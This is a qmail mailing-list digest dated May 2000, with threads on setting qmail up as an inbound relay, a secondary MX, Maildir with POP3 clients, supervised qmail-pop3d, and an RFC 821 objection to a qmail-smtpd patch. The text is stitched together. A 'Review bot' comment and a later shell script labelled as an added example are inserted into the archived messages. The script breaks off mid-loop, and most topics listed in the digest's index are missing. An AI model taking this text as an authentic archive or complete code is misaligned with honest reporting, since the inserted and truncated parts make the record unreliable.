qmail Digest 25 May 2000 10:00:01 -0000 Issue 1012
Topics (messages 42260 through 42324):
Re: Meaning of (#4.4.1) in error message
42260 by: Curtis Generous
How to set up Qmail as a front-end (relaying) server?
42261 by: Ali Sahin
42262 by: Greg Owen
42266 by: Ali Sahin
42270 by: Greg Owen
42272 by: Ali Sahin
42273 by: Chris Johnson
42274 by: Ali Sahin
42275 by: Petr Novotny
42276 by: Chris Johnson
42277 by: Greg Owen
42278 by: Ali Sahin
42279 by: Greg Owen
42281 by: Greg Owen
42282 by: Chris Johnson
42285 by: Greg Owen
42287 by: Ali Sahin
Mail clients and Maildir format
42263 by: "Próspero, Esteban"
42264 by: Chris Johnson
42267 by: "Próspero, Esteban"
42269 by: Anton Pirnat
42289 by: Erwin Hoffmann
qmail-pop3d under supervise
42265 by: "Próspero, Esteban"
42268 by: Petr Novotny
Re: More on Qmail DSN.
42271 by: Markus Stumpf
Re: 553, version 0
42280 by: Uwe Ohse
How to set 2 qmail servers in the same domain
42283 by: Origoni, Maurizio
42284 by: Petr Novotny
R: How to set 2 qmail servers in the same domain
42286 by: Origoni, Maurizio
URGENT: forward and relay.....
42288 by: Christian Klippel
Qmail and solaris 7
42290 by: Ramy M. Hassan
qmail & pop-3 w/mbox format
42291 by: Mikhail Kuzminsky
42292 by: Peter van Dijk
templet user
42293 by: Walid Kassab
42294 by: Christian Wiese
42299 by: Mark Johnston
42305 by: Peter Cavender
Qpopper 2.53 remote problem, user can gain gid=mail (fwd)
42295 by: John Gonzalez/netMDC admin
42296 by: Scott D. Yelich
42297 by: John Gonzalez/netMDC admin
42304 by: Russ Allbery
42323 by: listy-dyskusyjne Krzysztof Dabrowski
securing pop3 sessions
42298 by: spacetask.youwasahero.com
42300 by: Len Budney
42301 by: Adam McKenna
42303 by: Louis Theran
42308 by: spacetask.youwasahero.com
42310 by: Louis Theran
42313 by: Len Budney
42314 by: Len Budney
42315 by: Bob Rogers
42316 by: Russell Nelson
42317 by: Russ Allbery
42318 by: Patrick Berry
42319 by: llu
qvacation
42302 by: Kaare Rasmussen
Number of mailboxes per Exchange server
42306 by: Stefaan A Eeckels
Another big qmail user..
42307 by: Peter Cavender
Re: Qpopper 2.53 remote problem
42309 by: vogelke
42311 by: Adam McKenna
PINE
42312 by: Adam McKenna
forward all mail from one virtual domain to another virtual domain
42320 by: Marco Leeflang
Re: pop3
42321 by: Claus Färber
42322 by: Alex Shipp
42324 by: Christer Matson
Administrivia:
To unsubscribe from the digest, e-mail:
[EMAIL PROTECTED]
To subscribe to the digest, e-mail:
[EMAIL PROTECTED]
To bug my human owner, e-mail:
[EMAIL PROTECTED]
To post to the list, e-mail:
[EMAIL PROTECTED]
----------------------------------------------------------------------
According to Magnus Bodin:
>
> On Tue, May 23, 2000 at 07:59:24PM +0100, Chris Green wrote:
> >
> > Secondly what does that (#4.4.1) mean? I can't find any paragraph
> > number 4.4.1 in the documentation.
> >
>
> It's defined in RFC 1839 <http://rfc1839.x42.com/>

Small typo above, it's actually, RFC1893 <http://rfc1893.x42.com/>

> 4.X.X Persistent Transient Failure
> A persistent transient failure is one in which the message as
> sent is valid, but some temporary event prevents the successful
> sending of the message. Sending in the future may be successful.
>
> X.4.X Network and Routing Status
> The networking or routing codes report status about the
> delivery system itself. These system components include any
> necessary infrastructure such as directory and routing
> services. Network issues are assumed to be under the
> control of the destination or intermediate system
> administrator.
>
> X.4.1 No answer from host
> The outbound connection attempt was not answered, either
> because the remote system was busy, or otherwise unable to
> take a call. This is useful only as a persistent transient
> error.

--curtis
Hi everyone,

I'm a rather newbie on Qmail. I've set it up and it seems to be working fine, with tcpwrappers. What I wanted to do is set up qmail as a front-end server. It will accept all the smtp mail in the name of another server (which is behind a firewall). I think this is about /etc/tcp.smtp and control/smtproutes files. I've set them as following;

/etc/tcp.smtp
----
127.:allow,RELAYCLIENT=""
----

Although I don't know much about this file's syntax, it didn't seem enough to me.

control/smtproutes
----
mycompany.com:10.21.200.200
my2ndcomp.com:10.21.200.201
----

other control files include necessary information about mycompany.com and my2ndcomp.com;

I'll be appreciated if someone can tell me what's wrong or what do I need to do this.

Thanks in advance,
Ali Sahin
> It will accept all the smtp mail in the name of another
> server (which is behind a firewall). I think this is about
> /etc/tcp.smtp and control/smtproutes files. I've set them
> as following;
>
> /etc/tcp.smtp
> ----
> 127.:allow,RELAYCLIENT=""

For those hosts which are allowed to use this machine as an outbound relay, add them to this file. Based on what you say below, it looks like you have two internal mail servers, so you add these two lines:

    10.21.200.200:allow,RELAYCLIENT=""
    10.21.200.201:allow,RELAYCLIENT=""

There is documentation for this format at http://cr.yp.to/ucspi-tcp/tcprules.html. Once you've modified the file, run tcprules like this:

    tcprules /etc/tcp.smtp.cdb /tmp/tcp.smtp.tmp < /etc/tcp.smtp

And then just make sure your tcpserver invocation of qmail-smtpd has '-x /etc/tcp.smtp.cdb' in it.

You say tcpwrappers above, and I'm giving instructions for tcpserver which is part of ucspi. If you meant tcpserver/ucspi, then this is okay; if not, you'll need to find the right way to do the equivalent with tcpwrappers. All you're doing is setting the RELAYCLIENT environment variable for the invocation of each qmail-smtpd process. And if you're using tcpwrappers, you don't care about tcp.smtp but rather hosts.allow.

> control/smtproutes
> ----
> mycompany.com:10.21.200.200
> my2ndcomp.com:10.21.200.201
> ----

You'll probably want to quote those domain literals, like such:

    mycompany.com:[10.21.200.200]

I'm not completely sure that's necessary, but I think it is.

-- gowen -- Greg Owen -- [EMAIL PROTECTED]
> > 127.:allow,RELAYCLIENT=""
>
> For those hosts which are allowed to use this machine
> as an outbound
--------
Actually, here Qmail is supposed to be an inbound relay. The servers behind the firewall sends out smtps directly. So in this case too, will the tcp.smtp be like below you said?

> relay, add them to this file. Based on what you say below, it looks like
> you have two internal mail servers, so you add these two lines:
>
> 10.21.200.200:allow,RELAYCLIENT=""
> 10.21.200.201:allow,RELAYCLIENT=""
>
> There is documentation for this format at
> http://cr.yp.to/ucspi-tcp/tcprules.html. Once you've modified the file, run tcprules like this:
>
> tcprules /etc/tcp.smtp.cdb /tmp/tcp.smtp.tmp < /etc/tcp.smtp
>
> And then just make sure your tcpserver invocation of qmail-smtpd has
> '-x /etc/tcp.smtp.cdb' in it.
--------
These are ok. It's in the invocation line.

>
> You say tcpwrappers above, and I'm giving instructions for tcpserver
> which is part of ucspi. If you meant tcpserver/ucspi, then this is okay; if
--------
Right. I'm using ucspi wrappers.

> not, you'll need to find the right way to do the equivalent with
> tcpwrappers. All you're doing is setting the RELAYCLIENT environment
> variable for the invocation of each qmail-smtpd process. And if you're
> using tcpwrappers, you don't care about tcp.smtp but rather hosts.allow.
>
> > control/smtproutes
> > ----
> > mycompany.com:10.21.200.200
> > my2ndcomp.com:10.21.200.201
> > ----
>
> You'll probably want to quote those domain literals, like such:
>
> mycompany.com:[10.21.200.200]
>
> I'm not completely sure that's necessary, but I think it is.
--------
I thought the same way before too, but I've this notation in another server's file. And afterall, according to log files, it does connect to that server without specifying []s.

-Ali
> Actually, here Qmail is supposed to be an inbound relay. The
> servers behind the firewall sends out smtps directly. So in
> this case too, will the tcp.smtp be like below you said?

No - if you're only relaying inbound, then you don't need to modify tcp.smtp at all. That file only affects mail to domains not listed in rcpthosts (and we presume you have mydomain.com and my2ndcomp.com in rcpthosts and smtproutes).

> I thought the same way before too, but I've this notation in another
> server's file. And afterall, according to log files, it does
> connect to that server without specifying []s.

In that case you should be all set. Are you experiencing problems with this working, or were you just getting a sanity check on your configuration?

If you are experiencing problems, what problems do you have? Is there any log activity associated with the attempts?

And if you're experiencing problems, please let us know the real domain names involved and the hostname for the relay so we can check your DNS setup.

-- gowen -- Greg Owen -- [EMAIL PROTECTED]
Thanks for your answer Mark.

Actually I need to setup Qmail only as an inbound server. And tcp.smtp lines' purpose seems to specify from which hosts Qmail is to accept relaying smtp queries. But in my case, there is no such relaying. I want it to accept all smtp connections from all over the world (of course only if destined to [EMAIL PROTECTED] or [EMAIL PROTECTED]) and pass them (as is) to either 10.21.200.200 or 10.21.200.201 according to the host of which the email is sent.

What would I need to do?

-----Original Message-----
From: mark [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, May 24, 2000 4:59 PM
To: Ali Sahin
Subject: Re: How to set up Qmail as a front-end (relaying) server?

In other words you would like to setup a mail exchanger?
(PS - I'm fairly new to qmail too)

In tcp.smtp of the MX you should have the ip ranges that are allowed to use that server. For example I have an entry

    192.102.9.:allow,RELAYCLIENT=""

This allows all users on that network to use my MX.

Next is to add that domain into rcpthosts. This means that the server will now accept mail for that domain.

Then assuming that you don't have rewrites or virtual domains you need to enter in a smtproute for that domain.

    "my.domain.com:[ip number of host]"

Restart qmail-send "kill -HUP ps number of qmail-send"

Next would be to add a MX record in your primary DNS server for that host.
Restart the DNS.

I hope that helps,
If you are unclear or next extra help just give me a ring.

Best of Luck
Mark
On Wed, May 24, 2000 at 05:11:13PM +0300, Ali Sahin wrote:
> Actually I need to setup Qmail only as an inbound server. And tcp.smtp lines'
> purpose seems to specify from which hosts Qmail is to accept relaying smtp
> queries. But in my case, there is no such relaying. I want it to accept all
> smtp connections from all over the world (of course only if destined to
> [EMAIL PROTECTED] <mailto:[EMAIL PROTECTED]> or [EMAIL PROTECTED]
> <mailto:[EMAIL PROTECTED]> ) and pass them (as is) to either 10.21.200.200 or
> 10.21.200.201 according to the host of which the email is sent.

You don't need to use tcp.smtp or -x with tcpserver at all. Just stick mycomany.com and my2ndcomp.com in control/rcpthosts, and put:

    mycomany.com:10.21.200.200
    my2ndcomp.com:10.21.200.201

in control/smtproutes. That should be all you have to do.

Chris
> In that case you should be all set. Are you experiencing problems
> with this working, or were you just getting a sanity check on your
> configuration?
-------
Yeah, when I try to send an email to a user (which has a mailbox on the internal server but does not have one on the Qmail) qmail refuses to pass that mail to my internal server. It's going to be a real hard work for me to do if Qmail requires me to open a mailbox for every user on the internal server even though the mere thing it will do is to forward the messages.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On 24 May 00, at 17:15, Ali Sahin wrote:
> Yeah, when I try to send an email to a user (which has a mailbox on
> the internal server but does not have one on the Qmail) qmail refuses
> to pass that mail to my internal server.

Take that domain out of locals and/or virtualdomains and keep it _only_ in smtproutes and rcpthosts.

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.0.2 -- QDPGP 2.60
Comment: http://community.wow.net/grt/qdpgp.html

iQA/AwUBOSvWhlMwP8g7qbw/EQK7WACeMnUeiZeiDK1INgHNQMcgN1EHrywAoOhJ
7l6ZNw3UPqKCzShFMYfpjK7O
=wFFi
-----END PGP SIGNATURE-----
--
Petr Novotny, ANTEK CS
[EMAIL PROTECTED]
http://www.antek.cz
PGP key ID: 0x3BA9BC3F
-- Don't you know there ain't no devil there's just God when he's drunk.
[Tom Waits]
On Wed, May 24, 2000 at 05:15:50PM +0300, Ali Sahin wrote:
> > In that case you should be all set. Are you experiencing problems
> > with this working, or were you just getting a sanity check on your
> > configuration?
> -------
> Yeah, when I try to send an email to a user (which has a mailbox on the
> internal server but does not have one on the Qmail) qmail refuses to pass
> that mail to my internal server. It's going to be a real hard work for me to
> do if Qmail requires me to open a mailbox for every user on the internal
> server even though the mere thing it will do is to forward the messages.

I'd like to see evidence of that. If your domains aren't listed in control/locals or control/virtualdomains (and they shouldn't be), then whether there's a mailbox on the qmail relay for the user name in question is irrelevant. If they are listed in control/locals or control/virtualdomains, then nothing will be relayed to your internal server.

What does "qmail refuses to pass that mail to my internal server" mean, exactly?

Chris
> Yeah, when I try to send an email to a user (which has a
> mailbox on the internal server but does not have one on
> the Qmail) qmail refuses to pass that mail to my internal
> server.

You know, if we knew what error messages or log messages accompany this "refusal," we'd probably be able to help you. But until then, we're all shooting in the dark.

> It's going to be a real hard work for me to do if Qmail
> requires me to open a mailbox for every user on the internal
> server even though the mere thing it will do is to forward
> the messages.

It doesn't require that. Your configuration is broken. But you've provided absolutely minimal information about your config, and absolutely nothing from your logs, so we can't help you yet.

-- gowen -- Greg Owen -- [EMAIL PROTECTED]
Ok, here's my setup;

control/smtproutes
---
mycompany.com:10.21.200.200
my2ndcomp.com:10.21.200.201
---

control/rcpthosts
---
mycompany.com
my2ndcomp.com
---

control/me
---
mx1.mycompany.com
---

and, here's a sample log of what happens;
I've opened a telnet session to Qmail, and sent two messages. One to [EMAIL PROTECTED] and the other to [EMAIL PROTECTED] Both has mailboxes on the internal server. But only asahin has a mailbox on Qmail. What I want is to forward both asahin and qmailtest messages to internal server. [EMAIL PROTECTED] seems to work, but not the way I want. And the other doesn't work at all.

----
new msg 128847
info msg 128847: bytes 1350 from <#@[]> qp 2935 uid 502
starting delivery 841: msg 128847 to local [EMAIL PROTECTED]
status: local 2/10 remote 0/20
delivery 840: success: did_0+1+0/qp_2935/
status: local 1/10 remote 0/20
end msg 128846
delivery 841: success: did_1+0+0/
status: local 0/10 remote 0/20
end msg 128847
new msg 128846
info msg 128846: bytes 196 from <[EMAIL PROTECTED]> qp 2949 uid 503
starting delivery 842: msg 128846 to local [EMAIL PROTECTED]
status: local 1/10 remote 0/20
delivery 842: failure: Sorry,_no_mailbox_here_by_that_name._(#5.1.1)/
status: local 0/10 remote 0/20
bounce msg 128846 qp 2952
end msg 128846

-----Original Message-----
From: 'Chris Johnson' [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, May 24, 2000 5:20 PM
To: Ali Sahin
Subject: Re: How to set up Qmail as a front-end (relaying) server?

On Wed, May 24, 2000 at 05:18:07PM +0300, Ali Sahin wrote:
> > You don't need to use tcp.smtp or -x with tcpserver at all. Just stick
> > mycomany.com and my2ndcomp.com in control/rcpthosts, and put:
> >
> > mycomany.com:10.21.200.200
> > my2ndcomp.com:10.21.200.201
> >
> > in control/smtproutes.
> ------
> That's what I've done Chris, but Qmail rejects to forward the messages that
> it doesn't have a mailbox for.

That simply will not happen. There are details of your setup that you're not telling us.

Chris
> Ok, here's my setup;
...
> control/smtproutes
> control/rcpthosts
> control/me

What's in control/locals?

> info msg 128846: bytes 196 from <[EMAIL PROTECTED]> qp 2949 uid 503
> starting delivery 842: msg 128846 to local [EMAIL PROTECTED]
> status: local 1/10 remote 0/20
> delivery 842: failure: Sorry,_no_mailbox_here_by_that_name._(#5.1.1)/

This message indicates that the mail relay thinks that it accepts mail for ihlas.com.tr (presumably that's either mycompany.com or my2ndcomp.com) locally, and it doesn't even look at smtproutes.

-- gowen -- Greg Owen -- [EMAIL PROTECTED]
> This message indicates that the mail relay thinks that
> it accepts mail for ihlas.com.tr (presumably that's either
> mycompany.com or my2ndcomp.com) locally, and it doesn't even
> look at smtproutes.

Sorry, brain outsped fingers; I meant:

This message indicates that the mail relay thinks that it accepts mail for mycompany.com locally, and it doesn't even look at smtproutes.

-- gowen -- Greg Owen -- [EMAIL PROTECTED]
On Wed, May 24, 2000 at 05:32:23PM +0300, Ali Sahin wrote:
> control/smtproutes
> ---
> mycompany.com:10.21.200.200
> my2ndcomp.com:10.21.200.201
> ---
>
> control/rcpthosts
> ---
> mycompany.com
> my2ndcomp.com
> ---
>
> control/me
> ---
> mx1.mycompany.com
> ---

Okay, first of all, WHAT ARE YOUR REAL DOMAIN NAMES? Fake domain names make people on this list *insane*. It may not make a difference in this case, but it frequently does make a difference, and the person posting the question often doesn't realize this.

Second, what's in control/locals?

Please don't keep any more secrets from us. This is the 12th message in this thread; if you'd provided all the information right away, there would have been only two messages, yours and the answer.

Chris

>
> and, here's a sample log of what happens;
> I've opened a telnet session to Qmail, and sent two messages. One to
> [EMAIL PROTECTED] and the other to [EMAIL PROTECTED] Both has
> mailboxes on the internal server. But only asahin has a mailbox on Qmail.
> What I want is to forward both asahin and qmailtest messages to internal
> server. [EMAIL PROTECTED] seems to work, but not the way I want. And the
> other doesn't work at all.
>
>
> ----
>
> new msg 128847
> info msg 128847: bytes 1350 from <#@[]> qp 2935 uid 502
> starting delivery 841: msg 128847 to local [EMAIL PROTECTED]
> status: local 2/10 remote 0/20
> delivery 840: success: did_0+1+0/qp_2935/
> status: local 1/10 remote 0/20
> end msg 128846
> delivery 841: success: did_1+0+0/
> status: local 0/10 remote 0/20
> end msg 128847
> new msg 128846
> info msg 128846: bytes 196 from <[EMAIL PROTECTED]> qp 2949 uid 503
> starting delivery 842: msg 128846 to local [EMAIL PROTECTED]
> status: local 1/10 remote 0/20
> delivery 842: failure: Sorry,_no_mailbox_here_by_that_name._(#5.1.1)/
> status: local 0/10 remote 0/20
> bounce msg 128846 qp 2952
> end msg 128846
>
> > > Ok, here's my setup;
> > ...
> > > control/smtproutes
> > > control/rcpthosts
> > > control/me
> >
> > What's in control/locals?
>
> controls/locals
> ----
> mx1.mycompany.com
> mycompany.com
> mx1.mycompany.com
> ----

There's your problem. Remove mycompany.com from locals, because it isn't local.

-- gowen -- Greg Owen -- [EMAIL PROTECTED]
> Okay, first of all, WHAT ARE YOUR REAL DOMAIN NAMES? Fake
> domain names make
> people on this list *insane*. It may not make a difference in
> this case, but it
> frequently does make a difference, and the person posting the
> question often
> doesn't realize this.
----
Why I didn't give the real host name is because there is another machine serving for that host name, (thus I'm sending you messages as [EMAIL PROTECTED]). It's NOT that I hesitated to specify it in here.

mycompany.com=ihlas.com.tr

But if I were to specify this so, things would be much more complicated because there is a _working_ ihlas.com.tr SMTP server in real world and it's different than the new one I'm trying to set up.

>
> Second, what's in control/locals?
>
> Please don't keep any more secrets from us. This is the 12th
> message in this
> thread; if you'd provided all the information right away,
> there would have been
> only two messages, yours and the answer.
>
> Chris
Does anybody know if mail clients like Netscape Communicator or MS Outlook support the Maildir format? I haven't found out how...

Thanks in advance!
Esteban Javier Próspero
On Wed, May 24, 2000 at 10:43:40AM -0300, "Próspero, Esteban" wrote:
> Does anybody know if mail clients like Netscape Communicator or MS Outlook
> support the Maildir format? I haven't found out how...

Communicator and Outlook communicate with your server via POP3, and don't know or care what kind of storage you use. As long as your POP3 daemon supports Maildir (and qmail-pop3d does), any POP3 client will work.

Chris
Thanks!! so please take a look at my second question!

Esteban

-----Original Message-----
From: Chris Johnson [SMTP:[EMAIL PROTECTED]]
Sent: Wednesday, May 24, 2000 10:45 AM
To: "Próspero, Esteban"
Cc: '[EMAIL PROTECTED]'
Subject: Re: Mail clients and Maildir format

On Wed, May 24, 2000 at 10:43:40AM -0300, "Próspero, Esteban" wrote:
> Does anybody know if mail clients like Netscape Communicator or MS Outlook
> support the Maildir format? I haven't found out how...

Communicator and Outlook communicate with your server via POP3, and don't know or care what kind of storage you use. As long as your POP3 daemon supports Maildir (and qmail-pop3d does), any POP3 client will work.

Chris
Hello,

i guess there are (at least) two answers with both same result, but one is funnier..

1.) Netscape Communicator and MS Outlok boes do support Maildir format..

2.) It (should) does no matter what client (MUA, mail user agent) your'e using, they all are 'knocking' on the mail-servers door to ask for its mail if there is any. As far i know, if a mail client accesses this directories directly (like some unix clients do if youre on the same network) so this may cause problems.

a.) am i under 10 typos per line (including this one) now?
b.) am i right?
c.) is there any life before breakfast?

Regards from Stuttgart, Germany (not Arkansas nor Kansas)

Anton Pirnat

>>>>>>>>>>>>>>>>>> Original Message <<<<<<<<<<<<<<<<<<

On 24.05.00, 14:43:40, "Próspero, Esteban" <[EMAIL PROTECTED]> wrote on the subject Mail clients and Maildir format:

> Does anybody know if mail clients like Netscape Communicator or MS Outlook
> support the Maildir format? I haven't found out how...
> Thanks in advance!
> Esteban Javier Próspero
Hi,

you may have a look on my remarks about SUSE Linux and QMAIL:

http://www.fehcom.de/qmail_en.html

cheers.
eh.

At 14:46 24.5.2000 GMT, Anton Pirnat wrote:
>Hello,
>
>i guess there are (at least) two answers with both same result, but
>one is funnier..
>
>1.) Netscape Communicator and MS Outlok boes do support Maildir
>format..
>
>2.) It (should) does no matter what client (MUA, mail user agent)
>your'e using, they all are 'knocking' on the mail-servers door to ask
>for its mail if there is any. As far i know, if a mail client accesses
>this directories directly (like some unix clients do if youre on the
>same network) so this may cause problems.
>
>
>a.) am i under 10 typos per line (including this one) now?
>b.) am i right?
>c.) is there any life before breakfast?
>
>
>Regards from Stuttgart, Germany (not Arkansas nor Kansas)
>
>Anton Pirnat
>
>
>
>>>>>>>>>>>>>>>>>>> Original Message <<<<<<<<<<<<<<<<<<
>
>On 24.05.00, 14:43:40, "Próspero, Esteban"
><[EMAIL PROTECTED]> wrote on the subject Mail clients and Maildir format:
>
>
>> Does anybody know if mail clients like Netscape Communicator or MS
>Outlook
>> support the Maildir format? I haven't found out how...
>
>> Thanks in advance!
>> Esteban Javier Próspero
>
>
>
--
Dr. Erwin Hoffmann, fehcom (http://www.fehcom.de)
Wiener Weg 8, 50858 Koeln
Tel 0221 484 4923
Fax 0221 484 4924
Hello!

I've installed qmail+tcpserver+supervise in my Solaris 2.6 environment and now I want to get the pop3 server up and running. I kept up with Life with qmail, but it does not specify how to set up the pop3 server under supervise. How do I run a supervised version of qmail-pop3d? Does it work as qmail-smtpd (for the supervise view)? Which run control scripts should I edit?

Thanks in advance!!
Esteban Javier Próspero
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On 24 May 00, at 10:47, Próspero, Esteban wrote:
> Hello!
> I've installed qmail+tcpserver+supervise in my Solaris 2.6 environment
> and now I want to get the pop3 server up and running. I kept up with
> Life with qmail, but it does not specifiy how to set up the pop3
> server under supervise.

It seems you're right. Dave?

> How do I run a supervised version of
> qmail-pop3d? Does it work as qmail-smtpd (for the supervise view)?

Yes.

> Which run control scripts should I edit?

On my installation, I have created a new directory in /var/supervise (use any directory name you want) called qmail-pop3, I have put a "run" script in there (derived from qmail-smtpd's "run" script) and softlinked this dir into /service.

I am not sure this is lwq'ish enough :-)

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.0.2 -- QDPGP 2.60
Comment: http://community.wow.net/grt/qdpgp.html

iQA/AwUBOSvRjFMwP8g7qbw/EQLnGwCfYjf18SlOtN4cFAPUzvSEB5rZnroAoLYG
7grpXeyu1p37mfzGwxH7YPAQ
=hTvK
-----END PGP SIGNATURE-----
On Mon, May 22, 2000 at 04:49:09PM +0000, [EMAIL PROTECTED] wrote:
> ie.. in .qmail-default I'd have:
> | qreceipt $RECEPIENT
>
> So it would work with virtual domains and Netscape's MDN. So far nothing.
> I've even hacked qreceipt and still nada.. Can anyone help with idea, a
> patch, anything?

I dunno if this is a typo in this email, but it definitely should read "RECIPIENT" not "RECEPIENT"

\Maex

--
SpaceNet GmbH             | http://www.Space.Net/    | Stress is when you wake
Research & Development    | mailto:[EMAIL PROTECTED] | up screaming and you
Joseph-Dollinger-Bogen 14 | Tel: +49 (89) 32356-0    | realize you haven't
D-80807 Muenchen          | Fax: +49 (89) 32356-299  | fallen asleep yet.
On Wed, May 24, 2000 at 07:00:43AM +0200, clemensF wrote: > + // changed Wed-24.05.00-03:29 -ino: because fetchmail hickups when 553 > + // arrives out-of-band after recipient has been checked! > + // following line moved up from it's place in smtp_rcpt > + if (flagbarf) { err_bmf(); return; } Congratulations, your patched qmail-smtpd doesn't follow the RFC 821 anymore. RFC 821 allows to send one of the following: 421 <domain> Service not available, closing transmission channel 451 Requested action aborted: local error in processing 452 Requested action not taken: insufficient system storage 500 Syntax error, command unrecognized [This may include errors such as command line too long] 551 User not local; please try <forward-path> 552 Requested mail action aborted: exceeded storage allocation Do you really want to patch a fetchmail bug in qmail? Then try to answer 550 at "RCPT", that might work around that fetchmail bug. Regards, Uwe
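Review bot: the comment added with the quoted change says the `if (flagbarf) { err_bmf(); return; }` line was moved up from its place in smtp_rcpt, but not which handler it now runs in, and the quoted lines carry no context from which to tell. The comment should name the destination and state at which SMTP command the 553 it mentions is now sent, because that is exactly what the reply above objects to. Two smaller points: "it's place" should read "its place", and the dated note about accommodating fetchmail belongs in the patch description rather than inline in the code.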
Hi !

I have a qmail mail server with tcpserver and it works fine. Now I want to setup a second qmail server to use for secondary MX in my domains. How can I align the 2 mail servers so if the first server go down the second accepts mails for my customers in automatic mode ? When the first goes up again, the second sends to it the mail received automatically ?

Thanks :-))
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On 24 May 00, at 15:43, Origoni, Maurizio wrote:
> I have a qmail mail server with tcpserver and it works fine. Now I
> want to setup a second qmail server to use for secondary MX in my
> domains. How can I allign the 2 mail servers so if the first server
> go down the second accepts mails for my customers in automatic mode ?
> When the first goes up again, the second sends to it the mail received
> automatically ?

Isn't this a FAQ? On the secondary mailserver, you put the domains into rcpthosts but NOT into locals or virtualdomains. That's all.

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.0.2 -- QDPGP 2.60
Comment: http://community.wow.net/grt/qdpgp.html

iQA/AwUBOSvdW1MwP8g7qbw/EQL5GwCdEQ7DaGBGX6qnTDOpUdxjdznDh6sAnReX
Y/szkD+KAyggld5he0UnAbaH
=tm4y
-----END PGP SIGNATURE-----
--
Petr Novotny, ANTEK CS
[EMAIL PROTECTED]
http://www.antek.cz
PGP key ID: 0x3BA9BC3F
-- Don't you know there ain't no devil there's just God when he's drunk.
[Tom Waits]
Thanks...

So have I not to use tcpserver ? Can I start the second in inetd.conf and manage only rcphosts file ?

-----Original Message-----
From: Petr Novotny [mailto:[EMAIL PROTECTED]]
Sent: Wednesday 24 May 2000 16.47
To: Qmail List (E-mail)
Subject: Re: How to set 2 qmail servers in the same domain

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On 24 May 00, at 15:43, Origoni, Maurizio wrote:
> I have a qmail mail server with tcpserver and it works fine. Now I
> want to setup a second qmail server to use for secondary MX in my
> domains. How can I allign the 2 mail servers so if the first server
> go down the second accepts mails for my customers in automatic mode ?
> When the first goes up again, the second sends to it the mail received
> automatically ?

Isn't this a FAQ? On the secondary mailserver, you put the domains into rcpthosts but NOT into locals or virtualdomains. That's all.

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.0.2 -- QDPGP 2.60
Comment: http://community.wow.net/grt/qdpgp.html

iQA/AwUBOSvdW1MwP8g7qbw/EQL5GwCdEQ7DaGBGX6qnTDOpUdxjdznDh6sAnReX
Y/szkD+KAyggld5he0UnAbaH
=tm4y
-----END PGP SIGNATURE-----
--
Petr Novotny, ANTEK CS
[EMAIL PROTECTED]
http://www.antek.cz
PGP key ID: 0x3BA9BC3F
-- Don't you know there ain't no devil there's just God when he's drunk.
[Tom Waits]
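Both the front-end relay thread and the secondary MX thread above come down to the same rule: a domain listed in control/locals or control/virtualdomains is delivered locally and never reaches control/smtproutes. The script below is an added example, not code from any of the posters or from qmail; it models that decision and flags routes that can never be used. The function names are hypothetical, the sample files are constructed from the values posted in the relay thread, and the lookup is simplified (morercpthosts and user@domain virtualdomains lines are ignored).

```shell
#!/bin/sh
# Added example (not from the thread or from qmail itself): model how qmail
# treats a recipient domain, using the control files named in the posts.
# Simplified: morercpthosts and user@domain virtualdomains lines are ignored.

# ctl_lookup FILE NAME MODE: print the value (text after the first ':') of the
# line matching NAME; return 1 if nothing matches or FILE is missing.
#   exact: whole-name match only (locals)
#   wild : also ".suffix" wildcard lines (rcpthosts)
#   route: wild, plus the empty-name default line (virtualdomains, smtproutes)
ctl_lookup() {
    [ -f "$1" ] || return 1
    awk -v name="$2" -v mode="$3" '
        {
            line = tolower($0); sub(/[ \t\r]+$/, "", line)
            if (line == "" || substr(line, 1, 1) == "#") next
            c = index(line, ":")
            key = c ? substr(line, 1, c - 1) : line
            if (!(key in map)) map[key] = c ? substr(line, c + 1) : ""
        }
        END {
            if (name in map) { print map[name]; exit 0 }
            if (mode != "exact")
                for (i = 2; i <= length(name); i++)
                    if (substr(name, i, 1) == "." && (substr(name, i) in map)) {
                        print map[substr(name, i)]; exit 0
                    }
            if (mode == "route" && ("" in map)) { print map[""]; exit 0 }
            exit 1
        }
    ' "$1"
}

# classify_domain CONTROLDIR DOMAIN: print what happens to mail for DOMAIN
# arriving from a client without RELAYCLIENT set.
classify_domain() {
    cd_dir=$1
    cd_dom=$(printf '%s' "$2" | tr 'A-Z' 'a-z')
    # qmail-smtpd: no rcpthosts file means every domain is accepted.
    if [ -f "$cd_dir/rcpthosts" ] &&
       ! ctl_lookup "$cd_dir/rcpthosts" "$cd_dom" wild >/dev/null; then
        echo "rejected-by-rcpthosts"; return 0
    fi
    # qmail-send: control/locals falls back to control/me when absent.
    cd_locals=$cd_dir/locals
    [ -f "$cd_locals" ] || cd_locals=$cd_dir/me
    if ctl_lookup "$cd_locals" "$cd_dom" exact >/dev/null; then
        echo "local"; return 0
    fi
    # An empty value in virtualdomains or smtproutes marks an exception.
    if cd_val=$(ctl_lookup "$cd_dir/virtualdomains" "$cd_dom" route) &&
       [ -n "$cd_val" ]; then
        echo "virtual:$cd_val"; return 0
    fi
    if cd_val=$(ctl_lookup "$cd_dir/smtproutes" "$cd_dom" route) &&
       [ -n "$cd_val" ]; then
        echo "route:$cd_val"; return 0
    fi
    echo "remote-mx"
}

# shadowed_routes CONTROLDIR: list smtproutes domains whose route is never
# used because qmail-send delivers them locally first.
shadowed_routes() {
    [ -f "$1/smtproutes" ] || return 0
    sed -e 's/:.*//' -e '/^#/d' -e '/^\./d' -e '/^$/d' "$1/smtproutes" |
    while read -r sr_dom; do
        case $(classify_domain "$1" "$sr_dom") in
            local|virtual:*) echo "$sr_dom" ;;
        esac
    done
}

# Constructed sample: the control files as posted in the relay thread.
make_sample() {
    mkdir -p "$1"
    printf '%s\n' mycompany.com my2ndcomp.com > "$1/rcpthosts"
    printf '%s\n' mycompany.com:10.21.200.200 my2ndcomp.com:10.21.200.201 \
        > "$1/smtproutes"
    printf '%s\n' mx1.mycompany.com mycompany.com mx1.mycompany.com > "$1/locals"
    printf '%s\n' mx1.mycompany.com > "$1/me"
}

demo_dir=$(mktemp -d)
make_sample "$demo_dir"
for demo_dom in mycompany.com my2ndcomp.com example.org; do
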